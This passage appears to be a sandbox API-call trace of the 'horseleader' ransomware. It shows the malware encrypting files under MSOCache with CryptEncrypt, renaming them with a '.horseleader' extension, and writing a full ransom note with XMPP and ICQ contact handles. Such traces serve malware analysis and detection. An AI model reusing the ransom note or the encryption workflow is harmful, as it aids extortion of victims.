Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.horseleader")) returned 1 [0212.181] GetProcessHeap () returned 0x780000 [0212.181] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.181] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0212.181] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0212.182] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0212.182] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0212.182] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0212.182] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0212.182] lstrlenW (lpString=".testttjffg") returned 11 [0212.182] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0212.182] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.182] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.182] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.182] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0212.182] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0212.182] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=9352) returned 1 [0212.183] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x2488, lpOverlapped=0x0) returned 1 [0212.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffdb78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.199] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x2488, lpOverlapped=0x0) returned 1 [0212.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.199] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.199] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, 
lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.200] CloseHandle (hObject=0x21c) returned 1 [0212.200] GetProcessHeap () returned 0x780000 [0212.200] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.200] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0212.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0212.201] GetProcessHeap () returned 0x780000 [0212.201] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.201] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0212.201] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Windows") returned -1 [0212.201] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0212.201] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".horseleader") returned 0x0 [0212.202] lstrcmpW (lpString1="ShellUI.MST", 
lpString2="#Decrypt#.txt") returned 1 [0212.202] lstrcmpW (lpString1="ShellUI.MST", lpString2="_uninstalling_.png") returned 1 [0212.202] lstrlenW (lpString=".testttjffg") returned 11 [0212.202] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", lpSrch=".testttjffg") returned 0x0 [0212.202] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.202] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.202] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.202] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0212.202] StrStrW (lpFirst="ShellUI.MST", lpSrch=".txt") returned 0x0 [0212.203] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=3584) returned 1 [0212.203] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0xe00, lpOverlapped=0x0) returned 1 [0212.208] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.208] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0xe00, lpOverlapped=0x0) returned 1 [0212.208] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.208] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.209] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.209] CloseHandle (hObject=0x21c) returned 1 [0212.209] GetProcessHeap () returned 0x780000 [0212.209] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.209] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.horseleader") returned 90 [0212.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.horseleader")) returned 1 [0212.211] GetProcessHeap () returned 0x780000 [0212.211] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.211] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, 
nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ShellUI.MST", cAlternateFileName="")) returned 0 [0212.211] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0212.211] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0212.211] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0212.212] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0212.212] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0212.213] lstrlenA (lpString="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") returned 1368 [0212.214] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0212.214] CloseHandle (hObject=0x1cc) returned 1 [0212.214] GetProcessHeap () returned 0x780000 [0212.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0212.214] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0212.214] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0212.214] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned 66 [0212.214] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0212.214] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0212.214] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0212.214] GetProcessHeap () returned 0x780000 [0212.214] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0212.215] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*") returned 68 [0212.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0212.219] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0212.219] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.") returned 68 [0212.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0212.220] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0212.220] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0212.220] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0212.220] lstrlenW (lpString=".testttjffg") returned 11 [0212.220] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0212.220] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.220] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0212.220] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0212.220] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0212.221] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0212.221] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\..") returned 69 [0212.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0212.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0212.221] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0212.221] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0212.221] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0212.221] lstrlenW (lpString=".testttjffg") returned 11 [0212.221] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0212.221] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.221] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.221] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0212.221] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0212.222] lstrcmpiW (lpString1="Access.en-us", lpString2="Windows") returned -1 [0212.222] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 79 [0212.222] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0212.222] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0212.222] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0212.222] GetProcessHeap () returned 0x780000 [0212.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.222] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*") returned 81 [0212.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", 
lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0212.228] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0212.228] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\.") returned 81 [0212.228] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0212.228] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="..", cAlternateFileName="")) returned 1 [0212.228] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0212.228] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\..") returned 82 [0212.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0212.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0212.228] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, 
ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0212.229] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Windows") returned -1 [0212.229] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0212.229] StrStrIW (lpFirst="AccessMUI.msi", lpSrch=".horseleader") returned 0x0 [0212.229] lstrcmpW (lpString1="AccessMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0212.229] lstrcmpW (lpString1="AccessMUI.msi", lpString2="_uninstalling_.png") returned 1 [0212.229] lstrlenW (lpString=".testttjffg") returned 11 [0212.229] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", lpSrch=".testttjffg") returned 0x0 [0212.229] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0212.229] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0212.229] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0212.231] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0212.231] StrStrW (lpFirst="AccessMUI.msi", lpSrch=".txt") 
returned 0x0 [0212.231] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2517504) returned 1 [0212.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.231] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.233] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.234] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.234] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x130d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.234] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, 